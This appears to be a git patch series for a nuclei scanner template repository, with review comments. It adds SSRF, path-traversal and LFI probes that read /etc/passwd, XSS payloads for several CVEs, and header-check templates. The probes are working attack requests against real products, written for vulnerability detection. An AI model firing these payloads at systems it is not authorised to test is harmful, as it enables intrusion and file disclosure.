From 7dd0795296a2d76db67a7c7bcbf364b2be4ea937 Mon Sep 17 00:00:00 2001 From: John Jackson <39013067+johnjhacking@users.noreply.github.com> Date: Tue, 6 Jul 2021 00:50:43 -0600 Subject: [PATCH 01/35] Create Netmask SSRF Template The basic test to fuzz for the netmask SSRF vulnerability would be to use an Octal payload that resolves to the localhost. I limited it to 4 basic testing payloads as to not slow down the speed of a full-length CVE directories test. --- cves/2021/CVE-2021-28918.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2021/CVE-2021-28918.yaml diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml new file mode 100644 index 0000000000..64643764d5 --- /dev/null +++ b/cves/2021/CVE-2021-28918.yaml @@ -0,0 +1,27 @@ +id: CVE-2021-28918 + +info: + name: npm Netmask SSRF + author: johnjhacking + severity: high + reference: https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md + description: Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. + tags: cve,cve2021,npm,netmask,ssrf,rfi,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/?url=http://0177.0.0.1/server-status" + - "{{BaseURL}}/?uri=http://0177.0.0.1/server-status" + - "{{BaseURL}}/?dest=http://0177.0.0.1/server-status" + - "{{BaseURL}}/?redirect=http://0177.0.0.1/server-status" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Apache Server Status" + - "Server Version" + part: body From 5d74f7e2e4b0c048366f2d4f4e8c8b2f57deff07 Mon Sep 17 00:00:00 2001 
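Review bot: The word matcher at the end of the new template has no `condition`, so a 200 response whose body merely contains `Server Version` satisfies it, and a hit proves only that one of four fixed parameter names proxies a request to the octal address — nothing in the matchers ties the result to the netmask package. Add `condition: and` under the `words` list so both strings are required, and consider saying in `description` that a match indicates an SSRF reachable via `0177.0.0.1` rather than a confirmed netmask dependency, so triage does not over-read the finding. `reference` is a single plain scalar here while the other templates touched in this series use a list; a sequence would keep the field consistent.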
From: John Jackson <39013067+johnjhacking@users.noreply.github.com>
Date: Tue, 6 Jul 2021 01:03:18 -0600
Subject: [PATCH 02/35] Update CVE-2021-28918.yaml
Fixing trailing spaces.
---
cves/2021/CVE-2021-28918.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml
index 64643764d5..314b84f1fb 100644
--- a/cves/2021/CVE-2021-28918.yaml
+++ b/cves/2021/CVE-2021-28918.yaml
@@ -23,5 +23,5 @@ requests:
 - type: word
 words:
 - "Apache Server Status"
- - "Server Version"
- part: body
+ - "Server Version"
+ part: body
From ede7ca07d0352203c79b1c2e83a558427c5f2646 Mon Sep 17 00:00:00 2001
From: John Jackson <39013067+johnjhacking@users.noreply.github.com>
Date: Tue, 6 Jul 2021 01:05:03 -0600
Subject: [PATCH 03/35] Fixing Trailing Spaces
As stated.
---
cves/2021/CVE-2021-28918.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml
index 314b84f1fb..bf38188859 100644
--- a/cves/2021/CVE-2021-28918.yaml
+++ b/cves/2021/CVE-2021-28918.yaml
@@ -21,7 +21,7 @@ requests:
 status:
 - 200
 - type: word
+ part: body
 words:
 - "Apache Server Status"
 - "Server Version"
- part: body
From 7fb23a24b9107e5c30ac02d9cc66949082a8e694 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Tue, 6 Jul 2021 12:41:16 +0530
Subject: [PATCH 04/35] minor update
---
cves/2021/CVE-2021-28918.yaml | 13 +++++++++----
1 file changed, 9 insertions(+), 4 deletions(-)
diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml
index bf38188859..debefe11c1 100644
--- a/cves/2021/CVE-2021-28918.yaml
+++ b/cves/2021/CVE-2021-28918.yaml
@@ -1,12 +1,14 @@ id: CVE-2021-28918 info: - name: npm Netmask SSRF + name: Netmask NPM Package <=v1.0.6 SSRF author: johnjhacking - severity: high - reference: https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md + severity: critical description: Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. - tags: cve,cve2021,npm,netmask,ssrf,rfi,lfi + tags: cve,cve2021,npm,netmask,ssrf,lfi + reference: | + - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md + - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 requests: - method: GET @@ -15,13 +17,16 @@ requests: - "{{BaseURL}}/?uri=http://0177.0.0.1/server-status" - "{{BaseURL}}/?dest=http://0177.0.0.1/server-status" - "{{BaseURL}}/?redirect=http://0177.0.0.1/server-status" + matchers-condition: and matchers: - type: status status: - 200 + - type: word part: body words: - "Apache Server Status" - "Server Version" + condition: and \ No newline at end of file From 59199ad35e737e2935694792582ded3b9a845682 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 6 Jul 2021 12:45:50 +0530 Subject: [PATCH 05/35] Update CVE-2021-28918.yaml Removed version as multiple reference includes multiple versions. --- cves/2021/CVE-2021-28918.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml index debefe11c1..1f0f3c4456 100644 --- a/cves/2021/CVE-2021-28918.yaml +++ b/cves/2021/CVE-2021-28918.yaml 
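Review bot: `reference: |` in the rewritten info block is a literal block scalar, so the two URLs load as one multi-line string that starts with `- `, not as a YAML sequence; the PATCH 05 hunk on this file keeps the same form when it appends a third URL. Write `reference:` followed by the `- https://…` items as a plain sequence, which is the shape later commits in this series adopt for other templates. The severity also moves from high to critical with nothing in the hunk or message explaining the change; if it follows the NVD entry now linked, a short note would help the next reviewer.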
@@ -1,14 +1,15 @@ id: CVE-2021-28918 info: - name: Netmask NPM Package <=v1.0.6 SSRF + name: Netmask NPM Package SSRF author: johnjhacking severity: critical - description: Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. + description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. tags: cve,cve2021,npm,netmask,ssrf,lfi reference: | - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 + - https://github.com/advisories/GHSA-pch5-whg9-qr2r requests: - method: GET From 71a27da89178b90d7ad593bb04e850f691dfb04d Mon Sep 17 00:00:00 2001 From: socketz Date: Wed, 28 Jul 2021 14:40:20 +0200 Subject: [PATCH 06/35] Added security headers templates --- .../http-present-security-headers.yaml | 116 ++++++++++++++++++ .../http-missing-security-headers.yaml | 113 +++++++++++++++++ 2 files changed, 229 insertions(+) create mode 100644 miscellaneous/http-present-security-headers.yaml create mode 100644 misconfiguration/http-missing-security-headers.yaml diff --git a/miscellaneous/http-present-security-headers.yaml b/miscellaneous/http-present-security-headers.yaml new file mode 100644 index 0000000000..66b98f6ea2 --- /dev/null +++ b/miscellaneous/http-present-security-headers.yaml 
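Review bot: The reworded description still claims SSRF, RFI and LFI, while `tags` carries only `ssrf,lfi` and the request and matchers exercise nothing beyond an SSRF to `/server-status`; description, tags and what the template can actually observe should agree. A tighter wording would be `description: Improper input validation of octal strings in the netmask npm package allows unauthenticated remote attackers to bypass IP filtering in dependent packages and reach internal hosts (SSRF).`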
@@ -0,0 +1,116 @@ +id: http-present-security-headers + +info: + name: HTTP Present Security Headers + author: socketz + severity: info + description: It searches present security headers, but obviously, could be so less generic and could be useless for Bug Bounty. + tags: config,headers + +requests: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + max-redirects: 3 + extractors: + - type: regex + part: header + group: 0 + regex: + - "(?im)(Strict-Transport-Security):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-Frame-Options):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-Content-Type-Options):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Content-Security-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-Permitted-Cross-Domain-Policies):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Referrer-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Clear-Site-Data):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Cross-Origin-Embedder-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Cross-Origin-Opener-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Cross-Origin-Resource-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-XSS-Protection):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Public-Key-Pins):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Except-CT):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Feature-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Permissions-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Document-Policy):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-XSRF-TOKEN):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(X-CSRF-TOKEN):(.*)" + - 
type: regex + part: header + group: 0 + regex: + - "(?im)(X-CSRFToken):(.*)" + - type: regex + part: header + group: 0 + regex: + - "(?im)(Authorization):(.*)" diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml new file mode 100644 index 0000000000..64db558b09 --- /dev/null +++ b/misconfiguration/http-missing-security-headers.yaml 
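Review bot: The extractor near the end of the hunk named `Except-CT` is a typo for the `Expect-CT` response header, so that regex can never match. The last four extractors (`X-XSRF-TOKEN`, `X-CSRF-TOKEN`, `X-CSRFToken`, `Authorization`) are not hardening headers, and with `group: 0` each captures the whole header line, so any token a server echoes in a response header lands verbatim in scan output and result files; drop them or narrow the capture to the header name. With `redirects: true` and `max-redirects: 3` the headers inspected belong to the final hop, which may be a different host than the one under test — worth a comment or `redirects: false`.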
@@ -0,0 +1,113 @@ +id: http-missing-security-headers + +info: + name: HTTP Missing Security Headers + author: socketz + severity: info + description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty. + tags: config,headers,misconfiguration + +requests: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + max-redirects: 3 + matchers-condition: or + matchers: + - type: word + name: "Strict-Transport-Security" + words: + - "Strict-Transport-Security" + part: header + negative: true + - type: word + name: "Content-Security-Policy" + words: + - "Content-Security-Policy" + part: header + negative: true + - type: word + name: "X-Frame-Options" + words: + - "X-Frame-Options" + part: header + negative: true + - type: word + name: "X-Content-Type-Options" + words: + - "X-Content-Type-Options" + part: header + negative: true + - type: word + name: "X-Permitted-Cross-Domain-Policies" + words: + - "X-Permitted-Cross-Domain-Policies" + part: header + negative: true + - type: word + name: "Referrer-Policy" + words: + - "Referrer-Policy" + part: header + negative: true + - type: word + name: "Clear-Site-Data" + words: + - "Clear-Site-Data" + part: header + negative: true + - type: word + name: "Cross-Origin-Embedder-Policy" + words: + - "Cross-Origin-Embedder-Policy" + part: header + negative: true + - type: word + name: "Cross-Origin-Opener-Policy" + words: + - "Cross-Origin-Opener-Policy" + part: header + negative: true + - type: word + name: "Cross-Origin-Resource-Policy" + words: + - "Cross-Origin-Resource-Policy" + part: header + negative: true + - type: word + name: "Access-Control-Allow-Origin" + words: + - "Access-Control-Allow-Origin" + part: header + negative: true + - type: word + name: "Access-Control-Allow-Credentials" + words: + - "Access-Control-Allow-Credentials" + part: header + negative: true + - type: word + name: "Access-Control-Expose-Headers" + words: + - "Access-Control-Expose-Headers" 
+ part: header + negative: true + - type: word + name: "Access-Control-Max-Age" + words: + - "Access-Control-Max-Age" + part: header + negative: true + - type: word + name: "Access-Control-Allow-Methods" + words: + - "Access-Control-Allow-Methods" + part: header + negative: true + - type: word + name: "Access-Control-Allow-Headers" + words: + - "Access-Control-Allow-Headers" + part: header + negative: true From 7d6a6c137a22acf4a797bab040e5f25d4154c05e Mon Sep 17 00:00:00 2001 From: socketz Date: Tue, 24 Aug 2021 14:43:45 +0200 Subject: [PATCH 07/35] Added CVE-2020-11420 --- cves/2020/CVE-2020-11420.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2020/CVE-2020-11420.yaml diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml new file mode 100644 index 0000000000..e418ec32b9 --- /dev/null +++ b/cves/2020/CVE-2020-11420.yaml 
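Review bot: The six `Access-Control-*` negative matchers at the end of the hunk report the absence of CORS headers as a finding, but a response with no `Access-Control-Allow-Origin` or `Access-Control-Allow-Credentials` is the restrictive default, so under `matchers-condition: or` almost every target is flagged. Remove those six matchers, or move them to a separate template that matches permissive values rather than absence. `Clear-Site-Data` is likewise only expected on logout-style responses, not on `GET /`, so its absence is noise. Matching header names as case-sensitive `word`s may also miss lowercase names on HTTP/2 responses; confirm how nuclei canonicalises header names before relying on this.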
@@ -0,0 +1,35 @@ +id: CVE-2020-11420 + +info: + name: ABB UPS Adapter CS141 – Path traversal + author: socketz + severity: medium + description: | + A vulnerability exists in the UPS Adapter CS141 included in the versions 1.66 to 1.88. An attacker + with Admin or Engineer login credentials could exploit the vulnerability by manipulating variables that + reference files and by doing this achieve access to files and directories outside the web root folder. An + attacker may access arbitrary files and directories stored in the file system, but integrity of the files are + not jeopardized as attacker have read access rights only. This attack is commonly known as Path + Traversal or Directory Traversal. + This Path Traversal vulnerability could be exploited only when Alarm Logs have been processed, + and then you can exploit it, before that, you should wait. + reference: | + - https://library.e.abb.com/public/ee46f3ff5823400f991ebd9bd43a297e/2CMT2020-005913%20Security%20Advisory%20CS141.pdf + tags: cve,cve2020,iot,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/api/devices/ups/control?code=getAlarmData&alarmFileName=../etc/passwd" + headers: + - Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + part: body + From 65d9d8acb297ff994b207a71876e67305ebbfcef Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 24 Aug 2021 23:13:00 +0530 Subject: [PATCH 08/35] lint fix --- cves/2020/CVE-2020-11420.yaml | 17 ++++++++--------- 1 file changed, 8 insertions(+), 9 deletions(-) diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml index e418ec32b9..123a068098 100644 --- a/cves/2020/CVE-2020-11420.yaml +++ b/cves/2020/CVE-2020-11420.yaml 
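Review bot: The description states the traversal requires Admin or Engineer credentials, yet the single GET in `path` carries no session or token, so presumably the request is rejected before the `root:.*:0:0:` regex is reached and the template can only fire where authentication is absent or otherwise bypassed. State that precondition in `description` (or chain the request after a login whose `accessToken` is extracted) so a no-hit is not read as not-vulnerable. `headers` is written as a list containing one mapping, whereas nuclei's request `headers` is a mapping, and `reference: |` is a block-scalar string rather than a list; both are cleaned up by later commits on this file.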
@@ -5,15 +5,15 @@ info: author: socketz severity: medium description: | - A vulnerability exists in the UPS Adapter CS141 included in the versions 1.66 to 1.88. An attacker - with Admin or Engineer login credentials could exploit the vulnerability by manipulating variables that - reference files and by doing this achieve access to files and directories outside the web root folder. An - attacker may access arbitrary files and directories stored in the file system, but integrity of the files are - not jeopardized as attacker have read access rights only. This attack is commonly known as Path + A vulnerability exists in the UPS Adapter CS141 included in the versions 1.66 to 1.88. An attacker + with Admin or Engineer login credentials could exploit the vulnerability by manipulating variables that + reference files and by doing this achieve access to files and directories outside the web root folder. An + attacker may access arbitrary files and directories stored in the file system, but integrity of the files are + not jeopardized as attacker have read access rights only. This attack is commonly known as Path Traversal or Directory Traversal. - This Path Traversal vulnerability could be exploited only when Alarm Logs have been processed, + This Path Traversal vulnerability could be exploited only when Alarm Logs have been processed, and then you can exploit it, before that, you should wait. - reference: | + reference: - https://library.e.abb.com/public/ee46f3ff5823400f991ebd9bd43a297e/2CMT2020-005913%20Security%20Advisory%20CS141.pdf tags: cve,cve2020,iot,lfi @@ -31,5 +31,4 @@ requests: - type: regex regex: - "root:.*:0:0:" - part: body - + part: body \ No newline at end of file From 3c95101f5a205906e29ec2437f5e25d1dcba5776 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 25 Aug 2021 00:31:27 +0530 Subject: [PATCH 09/35] Update CVE-2020-11420.yaml --- cves/2020/CVE-2020-11420.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) 
diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml
index 123a068098..7a8affbb53 100644
--- a/cves/2020/CVE-2020-11420.yaml
+++ b/cves/2020/CVE-2020-11420.yaml
@@ -21,8 +21,10 @@ requests:
 - method: GET
 path:
 - "{{BaseURL}}/api/devices/ups/control?code=getAlarmData&alarmFileName=../etc/passwd"
+
 headers:
- - Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol="
+ Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol="
+
 matchers-condition: and
 matchers:
 - type: status
From d705fbd84bd910dd7d064da1746cb59c2741850b Mon Sep 17 00:00:00 2001
From: sandeep
Date: Wed, 25 Aug 2021 00:33:54 +0530
Subject: [PATCH 10/35] Update CVE-2020-11420.yaml
---
cves/2020/CVE-2020-11420.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml
index 7a8affbb53..be676408b1 100644
--- a/cves/2020/CVE-2020-11420.yaml
+++ b/cves/2020/CVE-2020-11420.yaml
@@ -23,7 +23,7 @@ requests:
 - "{{BaseURL}}/api/devices/ups/control?code=getAlarmData&alarmFileName=../etc/passwd"
 headers:
- Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol="
+ Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol="
 matchers-condition: and
 matchers:
From f290b9f60d7aa2dc8d752605b12d46f327f8f5e2 Mon Sep 17 00:00:00 2001
From: socketz
Date: Wed, 25 Aug 2021 07:55:46 +0200
Subject: [PATCH 11/35] Deleted duplicate and in wrong directory
---
cves/2020/CVE-2019-9618.yaml | 26 --------------------------
1 file changed, 26 deletions(-)
delete mode 100644 cves/2020/CVE-2019-9618.yaml
diff --git a/cves/2020/CVE-2019-9618.yaml b/cves/2020/CVE-2019-9618.yaml
deleted file mode 100644
index bc0a6e0e6d..0000000000
--- a/cves/2020/CVE-2019-9618.yaml
+++ /dev/null
@@ -1,26 +0,0 @@ -id: CVE-2019-9618 - -info: - name: GraceMedia Media Player 1.0 - Local File Inclusion - author: 0x_Akoko - severity: critical - reference: | - - https://www.exploit-db.com/exploits/46537 - - https://nvd.nist.gov/vuln/detail/CVE-2019-9618 - tags: cve,cve2019,wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 \ No newline at end of file From 0ef631dce102db77f5d848cc97eb3da0cbc77e7b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 25 Aug 2021 16:52:35 +0530 Subject: [PATCH 12/35] Update http-missing-security-headers.yaml --- misconfiguration/http-missing-security-headers.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml index 64db558b09..350fcbe9db 100644 --- a/misconfiguration/http-missing-security-headers.yaml +++ b/misconfiguration/http-missing-security-headers.yaml @@ -5,7 +5,7 @@ info: author: socketz severity: info description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty. - tags: config,headers,misconfiguration + tags: config,headers,misconfiguration,generic requests: - method: GET From c766a8454d24d6512ee21c793205113212ba2ded Mon Sep 17 00:00:00 2001 
From: socketz Date: Wed, 25 Aug 2021 14:09:42 +0200 Subject: [PATCH 13/35] Fixed yaml linting errors --- cves/2012/CVE-2012-1835.yaml | 10 +++++----- cves/2018/CVE-2018-10818.yaml | 2 +- cves/2018/CVE-2018-10822.yaml | 2 +- cves/2019/CVE-2019-12616.yaml | 11 +++++------ cves/2019/CVE-2019-9618.yaml | 3 ++- cves/2020/CVE-2020-7209.yaml | 11 +++++------ cves/2020/CVE-2020-8813.yaml | 2 +- cves/2020/CVE-2020-9496.yaml | 13 ++++++------- misconfiguration/java-melody-exposed.yaml | 2 +- vulnerabilities/other/mcafee-epo-rce.yaml | 2 +- .../other/netgear-router-auth-bypass.yaml | 2 +- 11 files changed, 29 insertions(+), 31 deletions(-) diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml index 9bc5c08991..d92d5b7974 100644 --- a/cves/2012/CVE-2012-1835.yaml +++ b/cves/2012/CVE-2012-1835.yaml 
@@ -11,11 +11,11 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - "{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' matchers-condition: and matchers: diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index 2562be9725..da59c53d73 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml 
@@ -4,7 +4,7 @@ info: name: LG NAS Devices - Remote Code Execution (Unauthenticated) author: gy741 severity: critical - description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter. + description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the "password" parameter. reference: | - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 diff --git a/cves/2018/CVE-2018-10822.yaml b/cves/2018/CVE-2018-10822.yaml index 17410d6679..7078f33dfc 100644 --- a/cves/2018/CVE-2018-10822.yaml +++ b/cves/2018/CVE-2018-10822.yaml 
@@ -4,7 +4,7 @@ info: name: D-Link Routers - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request. + description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request. reference: | - https://www.exploit-db.com/exploits/45678 - https://nvd.nist.gov/vuln/detail/CVE-2018-10822 diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml index 1c3352b08d..00eb781972 100644 --- a/cves/2019/CVE-2019-12616.yaml +++ b/cves/2019/CVE-2019-12616.yaml @@ -6,10 +6,10 @@ info: description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim. severity: medium tags: cve,cve2019,phpmyadmin,csrf - reference: | - - https://www.phpmyadmin.net/security/PMASA-2019-4/ - - https://www.exploit-db.com/exploits/46982 - - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 + reference: + - https://www.phpmyadmin.net/security/PMASA-2019-4/ + - https://www.exploit-db.com/exploits/46982 + - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 requests: - method: GET 
@@ -18,7 +18,6 @@ requests: matchers-condition: and matchers: - - type: word words: - "phpmyadmin.net" @@ -32,4 +31,4 @@ requests: - type: status status: - 200 - - 401 #password protected + - 401 # password protected diff --git a/cves/2019/CVE-2019-9618.yaml b/cves/2019/CVE-2019-9618.yaml index 5ed8f7c7f0..b74a1b1b13 100644 --- a/cves/2019/CVE-2019-9618.yaml +++ b/cves/2019/CVE-2019-9618.yaml @@ -8,6 +8,8 @@ info: reference: | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618 - https://seclists.org/fulldisclosure/2019/Mar/26 + - https://www.exploit-db.com/exploits/46537 + - https://nvd.nist.gov/vuln/detail/CVE-2019-9618 tags: cve,cve2019,wordpress,wp-plugin,lfi requests: @@ -17,7 +19,6 @@ requests: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" diff --git a/cves/2020/CVE-2020-7209.yaml b/cves/2020/CVE-2020-7209.yaml index 74841a4ce3..ab9f1ff023 100644 --- a/cves/2020/CVE-2020-7209.yaml +++ b/cves/2020/CVE-2020-7209.yaml 
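Review bot: The two URLs added to cves/2019/CVE-2019-9618.yaml go inside a `reference: |` literal block, so they extend a multi-line string instead of a sequence, while this same commit's hunk for cves/2019/CVE-2019-12616.yaml converts that field into a real list. Apply the same conversion here — `reference:` followed by the four `- https://…` items — so the lint fix is consistent across the commit and the field parses the same way in every template it touches.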
@@ -11,12 +11,11 @@ info: http://packetstormsecurity.com/files/158025/LinuxKI-Toolset-6.01-Remote-Command-Execution.html https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-2 - # This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. - # The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability. - - # https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 - # vendor: https://www.hpe.com/us/en/home.html - # software: https://github.com/HewlettPackard/LinuxKI + # This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. + # The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability. + # https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 + # vendor: https://www.hpe.com/us/en/home.html + # software: https://github.com/HewlettPackard/LinuxKI requests: - method: GET diff --git a/cves/2020/CVE-2020-8813.yaml b/cves/2020/CVE-2020-8813.yaml index 586fc0dfb9..823b53f29c 100644 --- a/cves/2020/CVE-2020-8813.yaml +++ b/cves/2020/CVE-2020-8813.yaml 
